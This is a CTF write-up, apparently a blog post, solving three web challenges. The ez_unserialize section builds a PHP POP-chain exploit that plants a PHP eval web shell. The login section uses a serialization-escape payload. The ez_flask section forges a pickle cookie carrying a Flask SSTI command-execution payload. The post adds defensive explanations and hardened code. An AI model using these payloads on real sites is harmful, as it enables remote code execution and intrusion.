西电抗疫CTF (Xidian Anti-Epidemic CTF, Team Contest)

Posted: 2023-01-08 23:46:10

Preface

Never expected my first first-blood would come from being woken up for a nucleic-acid test and then doing challenges because I couldn't fall back asleep!

Web

ez_unserialize

Source:

<?php

class A
{
    public $var1;
    public $var2;
    public $secret;

    function __construct($p1, $p2)
    {
        $this->var1 = $p1;
        $this->var2 = $p2;
    }

    function __destruct()
    {
        $this->var1->secret = $this->var2;
    }
}

class B
{
    function __construct()
    {
        $this->Hello();
    }

    function __set($p1, $p2)
    {
        $p2->$p1();
    }

    function Hello()
    {
        echo "Welcome to 西电战役CTF!";
    }
}

class C
{
    public $var1;

    function __construct($p1)
    {
        $this->var1 = $p1;
    }

    function __call($p1, $p2)
    {
        call_user_func($this->var1);
    }
}

class D
{
    public $var1;
    public $var2;

    function __construct($p1, $p2)
    {
        $this->var1 = $p1;
        $this->var2 = $p2;
    }

    function write()
    {
        $dir = "sandbox";
        if (!is_dir($dir)) {
            mkdir('sandbox');
        }
        chdir('sandbox');
        $filename = md5($this->var1 . $_SERVER["REMOTE_ADDR"]) . ".php";

        if (preg_match("/[<>?]/", $this->var2)) {
            die("hhhhacker!!!");
        } else {
            file_put_contents("./" . $filename, $this->var2);
        }
    }
}

$a = $_GET['a'];

if (isset($a)) {
    unserialize($a);

} else if ($_POST['b'] == 'phpinfo') {
    phpinfo();
} else {
    highlight_file(__FILE__);
}

The chain is easy to spot: A::__destruct assigns to $var1->secret, which fires B::__set on a B object; __set calls a method on the C object passed as the value, which hits C::__call and call_user_func($this->var1), i.e. D::write. The preg_match filter is bypassed by making $var2 an array: preg_match() rejects an array and returns false, while file_put_contents() still writes the array's elements.

exp:

<?php
class A
{
    public $var1;
    public $var2;
    public $secret;
    function __construct()
    {
        $this->var1 = new B;
        $this->var2 = new C;
    }
}

class B
{
}

class C
{
    public $var1;
    function __construct()
    {
        $this->var1 = array(new D, "write");
    }
}

class D
{
    public $var1 = 'ggbond';
    public $var2 = ["shell"=>"<?php eval(\$_POST['cmd']);?>"];
}

$o = new A;
echo serialize($o);

login

The login page can be brute-forced directly.

That gives the source:

<?php
include('flag.php');
error_reporting(0);
function replace($payload){
    $filter="/flag/i";
    return preg_replace($filter,"nono!",$payload);
};
$sss=$_GET['ky'];
$ctf['sss1']='webwebweb';
$ctf['sss2']='pwnpwnpwn';
if(isset($sss)){
    if(strpos($sss,'flag')>=0){
        $ctf['sss1']=$sss;
        $ctf=unserialize(replace(serialize($ctf)));
        if($ctf['sss2']==="webwebweb"){
            echo $flag;
        }else{
            echo "nonono!";
        }
    }
}
else{
    highlight_file(__FILE__);
}
?>

Serialization escape by value growth. replace() runs on the already-serialized array, so every 4-byte "flag" becomes the 5-byte "nono!" while the s:150: length prefix in front of it stays the same; with 30 replacements the parser stops 30 bytes early, and the 30-byte tail ";s:4:"sss2";s:9:"webwebweb";} is read as structure that overrides sss2 (the original remainder is ignored as trailing data). Build the exp:

ky=flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";s:4:"sss2";s:9:"webwebweb";}
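To see the length mismatch at work, here is an added Python model (not part of the original writeup) of the challenge's serialize / replace / unserialize round trip for a flat string array, run with the page's payload, next to the fixed ordering that filters the raw value before serializing. Byte and character lengths coincide here because everything is ASCII.

```python
import re

# Constructed stand-in for the challenge's $ctf array (not the page's own code).
CTF = {"sss1": "webwebweb", "sss2": "pwnpwnpwn"}
# The payload from the writeup: 30 copies of "flag" plus a forged tail of exactly 30 bytes.
PAYLOAD = "flag" * 30 + '";s:4:"sss2";s:9:"webwebweb";}'

def php_filter(s: str) -> str:
    """Mirror of replace(): each 4-byte 'flag' becomes the 5-byte 'nono!'."""
    return re.sub(r"flag", "nono!", s, flags=re.IGNORECASE)

def php_serialize(d: dict) -> str:
    """serialize() for a flat string->string array: a:N:{s:len:"key";s:len:"val";...}"""
    body = "".join(f's:{len(k)}:"{k}";s:{len(v)}:"{v}";' for k, v in d.items())
    return f"a:{len(d)}:{{{body}}}"

def php_unserialize(s: str) -> dict:
    """Minimal unserialize() for that shape. Like PHP it trusts every s:N: length
    prefix and ignores any bytes that follow the closing brace."""
    head = re.match(r"a:(\d+):\{", s)
    pos = head.end()
    out = {}

    def read_string():
        nonlocal pos
        m = re.compile(r's:(\d+):"').match(s, pos)
        if not m:
            raise ValueError(f"expected string at offset {pos}")
        start, n = m.end(), int(m.group(1))
        if s[start + n:start + n + 2] != '";':
            raise ValueError(f"length prefix {n} does not match data at {start}")
        pos = start + n + 2
        return s[start:start + n]

    for _ in range(int(head.group(1))):
        key = read_string()
        out[key] = read_string()
    if s[pos] != "}":
        raise ValueError("missing closing brace")
    return out

def vulnerable_flow(user_input: str) -> dict:
    """The challenge's order: filter the *serialized* blob, so length prefixes go stale."""
    ctf = dict(CTF, sss1=user_input)
    return php_unserialize(php_filter(php_serialize(ctf)))

def hardened_flow(user_input: str) -> dict:
    """Fixed order: filter the raw value first, then serialize, so prefixes stay correct."""
    ctf = dict(CTF, sss1=php_filter(user_input))
    return php_unserialize(php_serialize(ctf))
```

The general rule the model illustrates: never rewrite a serialized blob; sanitize the values before serialization, or use a format such as JSON whose parser does not take lengths on trust.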

ez_flask

This one needs authentication. Looking at the cookies there is a user value; after searching for a while I found it is a Python pickle, and it took me ages to get the exp working.

app.py

class User:

    def __init__(self, name):
        self.name = name
        self.vip = True

exp.py

import app
from base64 import b64encode
from pickle import dumps

# Build a User whose name is the SSTI payload, pickle it, and emit it as the cookie value.
data = input(">>>")
o = app.User(data)
payload = dumps(o)
print("user=" + b64encode(payload).decode())

Then it's straight into Flask SSTI:

{{config.__class__.__init__.__globals__['os'].popen('cat /flag').read()}}

Run the script:

user=gASVcgAAAAAAAACMA2FwcJSMBFVzZXKUk5QpgZR9lCiMBG5hbWWUjEl7e2NvbmZpZy5fX2NsYXNzX18uX19pbml0X18uX19nbG9iYWxzX19bJ29zJ10ucG9wZW4oJ2NhdCAvZmxhZycpLnJlYWQoKX19lIwDdmlwlIh1Yi4=

Put the resulting payload in the cookie to get the flag.
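The root cause here is that the user cookie is a raw pickle the client controls. As an added example, not from the challenge or the writeup, this is how the same name/vip record can be carried as a JSON body with an HMAC-SHA256 tag so that a modified cookie is rejected before anything is decoded; the secret key is a constructed stand-in.

```python
import base64
import hashlib
import hmac
import json

# Constructed stand-in for the app's secret; a real deployment loads it from config, never the repo.
SECRET_KEY = b"constructed-demo-key-do-not-reuse"

def encode_body(user: dict) -> str:
    """JSON (pure data, no class references) then URL-safe base64, like the cookie on the page."""
    return base64.urlsafe_b64encode(json.dumps(user, sort_keys=True).encode()).decode()

def sign(body: str) -> str:
    """HMAC-SHA256 over the encoded body, hex-encoded."""
    return hmac.new(SECRET_KEY, body.encode(), hashlib.sha256).hexdigest()

def make_cookie(name: str, vip: bool) -> str:
    """Replacement for pickle.dumps(User(name)): encoded body and tag joined by '.'."""
    body = encode_body({"name": name, "vip": vip})
    return f"{body}.{sign(body)}"

def load_cookie(cookie: str):
    """Return the user dict only if the tag verifies and the body has the expected shape; else None.
    Verification runs before any decoding, so an unauthenticated body is never parsed."""
    body, sep, tag = cookie.rpartition(".")
    if not sep or not hmac.compare_digest(sign(body).encode(), tag.encode()):
        return None
    try:
        user = json.loads(base64.urlsafe_b64decode(body))
    except ValueError:  # covers binascii.Error and json.JSONDecodeError
        return None
    if (not isinstance(user, dict)
            or not isinstance(user.get("name"), str)
            or not isinstance(user.get("vip"), bool)):
        return None
    return user
```

With this scheme the name field is still attacker-chosen text and must be escaped by the template engine, but it can no longer smuggle in a pickle that instantiates arbitrary classes.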

Source: https://www.cnblogs.com/seizer/p/17035761.html